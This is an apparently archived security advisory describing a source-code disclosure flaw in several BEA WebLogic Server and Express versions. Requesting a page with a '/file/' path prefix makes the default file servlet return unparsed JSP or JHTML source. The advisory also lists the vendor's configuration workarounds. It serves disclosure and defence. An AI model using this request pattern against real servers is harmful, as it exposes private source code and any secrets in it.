COMMAND
WebLogic Server and Express
SYSTEMS AFFECTED
BEA WebLogic Server and Express 3.1.8, 4.0.x, 4.5.x, 5.1.x
PROBLEM
Following is based on Foundstone Security Advisory. A show code
vulnerability exists with BEA's WebLogic 5.1.0 allowing an
attacker to view the source code of any file within the web
document root of the web server.
WebLogic relies on four main Java Servlets to serve different
kinds of files. These servlets are:
FileServlet - for plain HTML pages
SSIServlet - for Server Side Includes pages
PageCompileServlet - for JHTML pages
JSPServlet - for Java Server Pages
Looking at the weblogic.properties file, here is how each of these
servlets are registered:
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
Further along the weblogic.properties file, there is a default
servlet which is called upon if a requested file does not have a
registered handler. The lines below show how the default servlet
is registered.
# Default servlet registration
# ------------------------------------------------
# Virtual name of the default servlet if no matching servlet
# is found weblogic.httpd.defaultServlet=file
Thus, if the file path in the URL is prefixed with "/file/", it
causes WebLogic to invoke the default servlet, which causes pages
to be displayed without being parsed or compiled.
It is easy to verify this vulnerability for a given system.
Prefixing the path to web pages with "/file/" in the URL causes
the file to be displayed without being parsed or compiled. For
example if the URL for a file "login.jsp" is:
http://site.running.weblogic/login.jsp
then accessing
http://site.running.weblogic/file/login.jsp
would cause the unparsed contents of the file to show up in the
web browser.
SOLUTION
Workaround (The vendor recommends)
==================================
Do not use the example configuration for the FileServlet in
production situations. It is possible to view the source of a
JSP/JHTML file in a browser if you do. For more information on
the file servlet, see "Setting up the File Servlet" in the online
documentation at:
http://www.weblogic.com/docs51/admindocs/http.html#file
The example registrations look like this:
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.file=defaultFilename=index.html
weblogic.httpd.defaultServlet=file
There are two ways to avoid this:
* Register the file servlet with a name that uses a random string
that will be difficult to guess. For example, the following
registrations will register the file servlet as 12foo34:
weblogic.httpd.register.12foo34=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.12foo34=defaultFilename=index.html
weblogic.httpd.defaultServlet=12foo34
* Register the file servlet using wild cards representing all of
the file extensions you will be serving. For example, the
following registrations register the file servlet to serve
.html files:
weblogic.httpd.register.*.html=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.*.html=defaultFilename=index.html
weblogic.httpd.defaultServlet=*.html
Repeat the above registrations for all the file types you will be
serving, for example, *.gif, *.jpg, *.pdf, *.txt, etc. Note:
This information is documented in the BEA WebLogic Server and
Express documentation at:
http://www.weblogic.com/docs51/admindocs/lockdown.html
Fix
===
Contact the vendor.